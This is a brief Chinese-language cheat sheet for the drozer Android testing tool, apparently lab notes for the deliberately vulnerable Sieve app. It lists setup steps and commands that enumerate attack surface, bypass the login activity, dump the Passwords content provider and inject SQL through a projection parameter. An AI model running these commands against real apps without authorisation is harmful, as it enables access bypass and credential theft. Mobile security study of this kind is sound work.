使用过程
电脑和模拟器(手机)都安装drozer,使用手机的话,需要数据线连接电脑,并启用usb调试模式
模拟器(手机)端开启drozer
电脑端使用adb端口转发:adb forward tcp:31415 tcp:31415
进行连接:drozer.bat console connect
常用命令
获取所有包名:run app.package.list
获取带有sieve的包名:run app.package.list –f sieve
查看信息:run app.package.info –a com.mwr.example.sieve
查看攻击面:run app.package.attacksurface com.mwr.example.sieve
查看activity漏洞点:run app.activity.info -a com.mwr.example.sieve
activity越权:run app.activity.start - -component com.mwr.example.sieve com.mwr.example.sieve.PWLi
查看service漏洞:run app.service.info -a com.mwr.example.sieve
查看Broadcast Receiver漏洞:run app.broadcast.info –a com.mwr.example.sieve
查看Content Provider漏洞点:run app.provider.info -a com.mwr.example.sieve
扫描数据库信息:run scanner.provider.finduris -a com.mwr.example.sieve
查看数据信息: run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
执行sql语句:run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM SQLITE_MASTER WHERE type=’table’;–”
扫描注入:run scanner.provider.injection -a com.mwr.example.sieve
扫描目录遍历:run scanner.provider.traversal -a com.mwr.example.sieve